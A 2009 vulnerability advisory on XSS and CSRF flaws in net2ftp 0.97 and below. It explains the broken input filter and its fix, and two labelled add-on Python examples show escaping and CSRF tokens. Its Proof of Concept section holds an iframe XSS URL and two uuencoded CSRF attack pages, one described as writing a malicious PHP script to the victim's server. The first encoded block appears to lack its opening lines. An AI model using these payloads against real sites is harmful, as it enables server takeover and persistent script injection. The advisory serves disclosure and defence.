net2ftp 0.97 XSS / XSRF

Posted Apr 8, 2009
Authored by C1c4Tr1Z

net2ftp versions 0.97 and below suffer from cross site scripting and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 433699ef9d591114e5c64f6df12a1c3da921c0505de64830a75dac18c05c1c86

#=cicatriz <c1c4tr1z@voodoo-labs.org>=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#
/) /) /)
_ _ _______(/ ________ // _ (/_ _ _____ _
(/__(_)(_)(_(_(_)(_) (/_(_(_/_) /_)_ o (_)/ (_(_/_
.-/
#=net2ftp <= 0.97 Cross-Site Scripting/Request Forgery=#=~~~~~~~~~~~~~~~(_/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Advisory & Vulnerability Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Title: net2ftp <= 0.97 Cross-Site Scripting/Request Forgery
Advisory ID: VUDO-2009-0804
Advisory URL: http://research.voodoo-labs.org/advisories/3
Date found: 2009-04-02
Vendors contacted: net2ftp
Class: Multiple Vulnerabilities
Remotely Exploitable: Yes
Locally Exploitable: No
Exploit/PoC Available: Yes
Policy: Full Disclosure Policy (RFPolicy) v2.0

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Tested & Vulnerable packages=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[+] net2ftp 0.97
[+] net2ftp 0.95

Beta:
[*] net2ftp 0.98 beta

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Solutions and Workarounds=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

The vendor has not released any fix or update.

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Technical Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Multiple vulnerabilities were found in the package net2ftp [1], version
0.98 and below. Two types of vulnerabilities were found: Cross-Site
Scripting and Cross-Site Request Forgery.

[*] Cross-Site Scripting (XSS):

This vulnerability is caused by a "typo" in the function
validateGenericInput(): the removal of the characters < and > fails
because the regular expression responsible for it is malformed, so a
lone < or > is never matched.

+++includes/registerglobals.inc.php @@ 1088:1102
1088 function validateGenericInput($input) {
1089
1090 // --------------
1091 // Remove the following characters <>
1092 // --------------
1093
1094 // Remove XSS code
1095 // $input = RemoveXSS($input);
1096
1097 // Remove < >
XXX 1098 $input = preg_replace("/\\<\\>]/", "", $input);
1099
1100 return $input;
1101
1102 } // end validateGenericInput
---includes/registerglobals.inc.php

This can easily be fixed by adding a "[" character to the pattern:

+++
$input = preg_replace("/[\\<\\>]/", "", $input);
---
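To make the one-character difference concrete, the following is an added example (not code from the advisory or from the net2ftp project) that mirrors the shipped pattern and the proposed fix in Python's re module, which treats \< and \> the same way PCRE does here, and adds the output-encoding step a defender would want on top of input stripping. The function names, the render_error_message()/contains_markup() helpers and the sample input are assumptions made for the example.

```python
import html
import re

# Pattern as shipped in net2ftp 0.97. In PHP the double-quoted string
# "/\\<\\>]/" becomes the regex /\<\>]/; without an opening "[" it only
# matches the literal three-character sequence "<>]", so a lone "<" or ">"
# is never removed.
BROKEN_PATTERN = re.compile(r"\<\>]")

# Pattern with the "[" restored, as the advisory proposes: a character
# class matching either "<" or ">".
FIXED_PATTERN = re.compile(r"[\<\>]")


def validate_generic_input_broken(value: str) -> str:
    """Mirror of the 0.97 behaviour: angle brackets pass through untouched."""
    return BROKEN_PATTERN.sub("", value)


def validate_generic_input_fixed(value: str) -> str:
    """Mirror of the advisory's one-character fix: angle brackets are stripped."""
    return FIXED_PATTERN.sub("", value)


def render_error_message(value: str) -> str:
    """Output-encode the value for an HTML context (attribute values included).

    Stripping "<" and ">" on input only stops tag injection; escaping on
    output also neutralises quotes, which matters when the string is echoed
    inside an attribute. This is the defence to apply regardless of the regex.
    """
    return html.escape(value, quote=True)


def contains_markup(value: str) -> bool:
    """Detection helper: flag a request parameter that still carries tag
    markup, e.g. to log an injection attempt against the errormessage field."""
    return FIXED_PATTERN.search(value) is not None


# Constructed sample value (hypothetical, not the advisory's PoC string),
# shaped like the kind of input the errormessage parameter receives.
SAMPLE_INPUT = '<iframe onload="alert(1)">'

if __name__ == "__main__":
    print("broken :", validate_generic_input_broken(SAMPLE_INPUT))
    print("fixed  :", validate_generic_input_fixed(SAMPLE_INPUT))
    print("escaped:", render_error_message(SAMPLE_INPUT))
```

Run stand-alone, the broken variant returns the sample unchanged, the fixed variant returns it with both brackets removed, and the escaped variant returns an HTML-safe string. The escaping step is the one to rely on: bracket stripping is a blacklist and does nothing for a value that lands inside an existing attribute.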

[*] Cross-Site Request Forgery (CSRF):

All the forms in the web application are vulnerable because none of
them checks a token to ensure that the user actually submitted the
form. An attacker can therefore trick the user into visiting a website
that uses this method and perform actions on the server, such as
creating, deleting, renaming or uploading files.
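The missing check described above is a synchronizer token. The following is an added example (not code from the advisory or from net2ftp) of the pattern in Python: a token derived from the user's session is embedded in every state-changing form and verified, in constant time, before any create/delete/rename/upload action runs. APP_SECRET, the session id, the csrf_token field name and the handle_state_change() helper are assumptions made for the example.

```python
import hashlib
import hmac
import secrets

# Assumed application secret, generated here only so the example runs
# offline; a real deployment loads it from configuration.
APP_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Derive a token bound to the user's session.

    It is emitted as a hidden field in each form. A page on another
    origin cannot read it, so a forged cross-site POST arrives without
    a value that matches this session.
    """
    return hmac.new(APP_SECRET, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def render_form(session_id: str, action: str) -> str:
    """Emit a form that carries the session-bound token as a hidden field."""
    token = issue_csrf_token(session_id)
    return (
        f'<form method="post" action="{action}">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        "</form>"
    )


def handle_state_change(session_id: str, form: dict) -> tuple:
    """Server-side gate to run before any file-changing action.

    Returns (status, message): 403 when the token is missing or does not
    match the one derived for this session, 200 otherwise. The comparison
    uses hmac.compare_digest so it does not leak timing information.
    """
    presented = form.get("csrf_token", "")
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(presented, expected):
        return 403, "csrf token missing or invalid"
    return 200, f"ok: {form.get('action', 'noop')}"


if __name__ == "__main__":
    sid = "session-abc"  # constructed session id
    legit = {"action": "newfile", "csrf_token": issue_csrf_token(sid)}
    forged = {"action": "newfile"}  # what a cross-site form can send
    print(handle_state_change(sid, legit))   # (200, 'ok: newfile')
    print(handle_state_change(sid, forged))  # (403, ...)
```

A token from one session is rejected for another, and a request with no token is rejected outright. Note the interplay with the first bug: a token only helps while the attacker cannot read the page, so an XSS in the same application defeats it, which is why both issues need fixing together.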

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Proof of Concept=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[*] Cross-Site Scripting (XSS):

+++
http://ftp.victim.com/?state=login_small&errormessage=<iframe onload="alert(/voodoo/.source);">
---

[*] Cross-Site Request Forgery (CSRF):

With this HTML page an attacker can create a malicious PHP script on
the user's server. (uuencoded)

+++
begin 644 attack.html
M;"YP:'`B/CQB<CX*"0D\=&5X=&%R96$@;F%M93TB=&5X="(@8VQA<W,](F5D
M:70B(')O=W,](C,S(B!S='EL93TB=VED=&@Z(#DY)3LB('=R87`](F]F9B(@
M;VYK97ED;W=N/2)486)497AT*"DB/CP_/6![)%]'151;)V-M9"==?6`_/CPO
M=&5X=&%R96$^"@D\+V9O<FT^"CQS8W)I<'0^"F1O8W5M96YT+F9O<FUS6S!=
G+G-U8FUI="@I.PH\+W-C<FEP=#X*"CPO8F]D>3X*/"]H=&UL/@H*
`
end
---

[*] CSRF + XSS:

This is a Cross-Site Request Forgery attack that creates a simple
Cross-Site Scripting attack in the "Bookmark" section. It can be even
worse, because the bookmark string can be written according to the
attacker's needs and the XSS vector becomes permanent if the user saves
that bookmark (the saved string is also vulnerable to XSS). (uuencoded)

+++
begin 644 xss-csrf-attack.html
M/&AT;6P^"CQB;V1Y/@H)/&9O<FT@:60](E-T871U<V)A<D9O<FTB(&%C=&EO
M;CTB:'1T<',Z+R]F='`N=FEC=&EM+F-O;2]I;F1E>"YP:'`B(&]N<W5B;6ET
M:7!T.F%L97)T*#`I.R(@='EP93TB:&ED9&5N(CX*"0D\:6YP=70@;F%M93TB
M=&5X="(@=F%L=64](B9L=#MI9G)A;64@<W)C/6AT='`Z+R]V;V]D;V\M;&%B
M<RYO<F<@;VYL;V%D/6%L97)T*'5N97-C87!E*"]V;V]D;V\E,C!P96]P;&4A
M+RYS;W5R8V4I*3LF9W0[)FQT.R]I9G)A;64F9W0[(B!T>7!E/2)H:61D96XB
M/@H)/"]F;W)M/@H*/'-C<FEP=#X*9&]C=6UE;G0N9F]R;7-;,%TN<W5B;6ET
?*"D["CPO<V-R:7!T/@H*/"]B;V1Y/@H\+VAT;6P^"@``
`
end
---

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Reporting Timeline=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[*] 02-04-2009: Bugs discovered.
[*] 03-04-2009: Voodoo contacted the vendor.
[*] 08-04-2009: After 5 days the vendor had given no response.
[*] 08-04-2009: Advisory VUDO-2009-0804 published.

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=References=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[1] http://www.net2ftp.com/

#=cicatriz <c1c4tr1z@voodoo-labs.org>=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#
#= Wed 08 Apr 2009 ART =#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#


Thanks packetstorm staff.
--
C1c4Tr1Z <research@voodoo-labs.org>
Voodoo Research Group